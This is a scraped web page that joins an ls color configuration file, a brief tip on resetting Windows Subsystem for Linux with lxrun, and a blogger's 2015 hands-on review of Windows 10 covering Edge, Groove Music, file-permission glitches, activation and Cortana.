# Below, there should be one TERM entry for each termtype that is colorizable
TERM linux
TERM console
TERM con132x25
TERM con132x30
TERM con132x43
TERM con132x60
TERM con80x25
TERM con80x28
TERM con80x30
TERM con80x43
TERM con80x50
TERM con80x60
TERM xterm
TERM xterm-color
TERM vt100
TERM rxvt
TERM rxvt-256color
TERM rxvt-cygwin
TERM rxvt-cygwin-native
TERM rxvt-unicode
TERM rxvt-unicode-256color
TERM rxvt-unicode256
TERM screen

# EIGHTBIT, followed by '1' for on, '0' for off. (8-bit output)
EIGHTBIT 1

# Below are the color init strings for the basic file types. A color init
# string consists of one or more of the following numeric codes:
# Attribute codes: 
# 00=none 01=bold 04=underscore 05=blink 07=reverse 08=concealed
# Text color codes:
# 30=black 31=red 32=green 33=yellow 34=blue 35=magenta 36=cyan 37=white
# Background color codes:
# 40=black 41=red 42=green 43=yellow 44=blue 45=magenta 46=cyan 47=white
NORMAL 00 # global default, although everything should be something.
FILE 00 # normal file
DIR 01;34 # directory
LINK 01;36 # symbolic link
FIFO 40;33 # pipe
SOCK 01;35 # socket
BLK 40;33;01 # block device driver
CHR 40;33;01 # character device driver

# This is for files with execute permission:
EXEC 01;32

# List any file extensions like '.gz' or '.tar' that you would like ls
# to colorize below. Put the extension, a space, and the color init string.
# (and any comments you want to add after a '#')
.cmd 01;32 # executables (bright green)
.exe 01;32
.com 01;32
.btm 01;32
.bat 01;32
.tar 01;31 # archives or compressed (bright red)
.tgz 01;31
.arj 01;31
.taz 01;31
.lzh 01;31
.zip 01;31
.z 01;31
.Z 01;31
.gz 01;31
.jpg 01;35 # image formats
.gif 01;35
.bmp 01;35
.xbm 01;35
.xpm 01;35
.tif 01;35

Resetting Windows Subsystem for Linux (WSL) via the lxrun command

If you jack up WSL, it’s easy to recover by simply removing and reinstalling.  To uninstall, open a command window (Windows Command window, not base) and use:

Lxrun /uninstall

This option will leave your home directory untouched.  Then use this command to reinstall the system:

Lxrun /install

Your home directory will be left untouched which means you can run your toolkit installation script above to reinstall your hacking toolkit.

Sources: Microsoft
Posted on Leave a comment

Windows 10 – rough around the edges but the future looks bright!

image thumb181

Windows 10 logo

Gotta give props to Microsoft – they did well with Windows 10 both in terms of the design and implementation of the OS and especially the unique rollout via Windows update. I’s obvious that Win10 is going to be a spectacular OS in the future. Why are my comments so forward looking? Because Windows 10, in its initial iteration, is pretty rough around the edges.

Star of the Show: The Edge Browser

Begin with Edge, Microsoft’s new browser replacement for Internet Explorer. Reading View, Reading lists and the ability to add notes to a webpage and file it away for future reference – brilliant. On the other hand, Edge doesn’t seem much more than say, Google Chrome (my favorite browser at the moment) for anything else. Edge is not faster nor does it offer any killer features that would draw me away from the tried and true Chrome browser with its multitude of plugins.

And yes, Edge has a few quirks too.  For instance, you can resize the window from the bottom and the left and right edges – but not the top?  I tested other applications and they still retain the old resize-from-any-side ability – just not Edge.  To fill the entire screen from top to bottom (the first thing I always do when I open a new browser window), you must first drag Edge to the top of the screen and then pull the bottom edge downward to snap it to full height.  I honestly have no idea why the took away the ability to resize it from the top but after the Windows 8 debacle, I’m not going to spend too much time trying to deduce Microsoft’s reasoning on this one.

Windows 10 – the Good… and the Bad

Windows 10 overall brings Microsoft’s OS up to par

As for the OS itself, it has some great new features. Multiple monitors are finally handled well and the new virtual desktops feature puts it on par with Linux desktops. The dark interface has just the right amount of transparency to give it a modern, shall I say “striking”, appearance.  Overall, the new Windows 10 experience is a beauty to behold.

Groove Music player and streaming music service

And the Groove Music Player – let’s say I’m seriously considering telling Spotify to suck it.  The only design problems I’ve seen with Groove so far are the inability to play FLAC files, a weird 50,000 file limit on uploads to OneDrive, and a rumored embarrassing 192bps bitrate (although I have to admit, if the rumored low-bitrate is true, through JBL monitors and 12″ subwoofer, Groove Music sounds remarkably good regardless).  The 50,000 file limit seems especially odd given I’m a new Groove paid subscriber *and* I have unlimited storage space on my paid OneDrive account.  Hopefully Microsoft fixes this limit quickly as it will certainly be a showstopper for some music listeners.

As for the Groove app itself, right now it’s a bit bare bones but that’s not necessarily a bad thing.  I’ve found nothing missing that would keep me from using it as my full-time music player.  In fact, the simpler, less convoluted interface is almost a relief compared to MusicBee or Spotify.  Stability however, is questionable at this point.  On more than one occasion Groove (and the new Photo app) have bombed while files related to the application where in the process of being synced to OneDrive.

Problems with the Edge web browser

However, things like Window dragging seems a bit flakey. For instance, I tore a tab off of the Edge browser, drug it to a second monitor, released and viola, the new window appeared back on the original monitor. WTF?  Then again, after the odd no-resize-from-the-top quirk, maybe the problem is the Edge browser itself.

Windows 10 and its new security schema

Windows 10 introduces several new security features under the hood but at this point, it’s too early to tell how effective the heightened security architecture is going to fare in the real world.  The new Device Guard (built on MS’s Hyper-V virtualization technology) and its whitelist solution to application safety sounds great in principle and Trusted Boot is a no-brainer, but I have seen some problems with Win10’s new security framework too.

The Windows 10 file lock/permissions problem

There is apparently some sort of file locking/permissions problem that I believe is related to the OS’s new security features.  I’ve seen it in MusicBee, Outlook 2013, and my son has seen it in AutoCAD.  In both instances, files were locked or otherwise unavailable for use by the application.  Running the program as Administrator (which defeats Microsoft’s intent for the new security mechanism) is one solution.  For some, removing the Home Group permissions for the file (or folder) in question fixes the problem.  As for Outlook 2013, check the security on the .pst file.  In my case my account was missing from the ACL list.  Add it (with full control?) and Outlook will then open correctly.  I don’t expect a patch from MS will fix the file lock problem at the OS level and won’t be surprised to see application vendors rolling out lots of patches for their products over the new few weeks.

Other odds and ends

Windows 10 logoThe Start menu is back and looks like a mashup of the old Windows 7 Start menu and the Windows 8 desktop-like start menu. I’m guessing that after spending some more time with it, I’m going to love it.  However, I’ve heard that there are some odd limitations to how many items the menu can hold which has already given some newly upgraded users quite a few headaches.

I’ve seen other quirks in Windows 10 too. Many of my default application settings were lost or more accurately, reverted to Microsoft’s applications (e.g. graphics files, default browser).  The notifications indicator seems to light-up at various times, even when there is no notification to view.  OneNote integration reminds me of the Windows 8 debacle and looks like Microsoft can’t decide whether you’re an Office 365 customer or an paid Office Online customer and as  a result, loads the freebie OneNote version even though the full-blown (and much more feature-rich) paid version is installed right next to it.  And my Lord, what have they done to Windows Explorer? On one of my machines, I can no longer open up the Control Panel. Apparently one of the control panel applets (I suspect it’s nVidia) is crashing the panel making it impossible (at the moment) for me to change some of the system settings. And occasionally the system seems to freeze for a second or two. I suspect a driver is the issue – just gotta figure out which one…

Update: looks like it’s the ASUS Xonar audio device.

Hello?  Cortana?

Cortana listens to what I say but won’t talk back (I work in a home office so I was sort of looking forward to the companionship). Head over to Optional Features and find the English text-to-speech option – surely there’s a setting there that will fix it. Expand the feature and click Manage and viola – nothing happens. It’s a dead button.  Click, click, click – nothing.  Another WTF.

Then I remembered that I had not activated the machine yet. On Windows 10 Pro, it activated itself but on Windows 10 Enterprise, it seems to require an additional step. Head to Accounts -> Your Account and what do I find? “You need to activate Windows before you can personalize your PC.” No link to activate the machine or anything – just a message in red letters scolding me. Head over to Update and Security and click Activation. Sure enough, the status shows “Windows is not activated”. Click the Activate button and after a minute or so, viola – a red message telling me “Windows can’t activate. Try again later.” The error details says “DNS name does not exist”. Come on Microsoft – you can do better than this.

After a bit of research I find that there is no KMS host so I need to change the type of key. I grab a new Enterprise product key from MSDN, enter it and activated Windows 10. And guess what? Cortana finally starts talking to me (she tells me something about a grasshopper in a bar named Steve).  She seems to have no problems retrieving and telling me the latest weather forecast, looking up movies and events, and just about everything else I’ve thrown at her.  “Hey Cortana!  I like you!” (to which she audibly responds, “Awesome!  Achievement unlocked!” but does not shoot dollar bills out of the DVD slot.)

Cloud everywhere – it’s coming…

It’s easy to see where Microsoft is going with this.  Windows 10 aims to be the backbone of everything you own in the cloud – email, calendar, documents, photos, video, and music.  The apps are there and the integration is already pretty tight.  In time, Windows 10 is going to be the place to go for all of your stuff – and that might just carry over to the mobile platform giving MS the toehold in the Mobile OS arena that they’ve been clamoring for.

Upgrade to Windows 10 – yes or no?

So in short, yes, Windows 10 is OK. Great? Not yet. But the future looks bright.  Do I suggest you upgrade now?  Yes, I think it is worth the upgrade.  It’s free, gets rid of the Windows 8.1 annoyances, and doesn’t seem to present any show-stopper bugs.  Plus, I figure Microsoft is going to be rolling out updates pretty regularly now, including feature updates.  If they do roll out timely upgrades, I’ll call Windows 10 a homerun.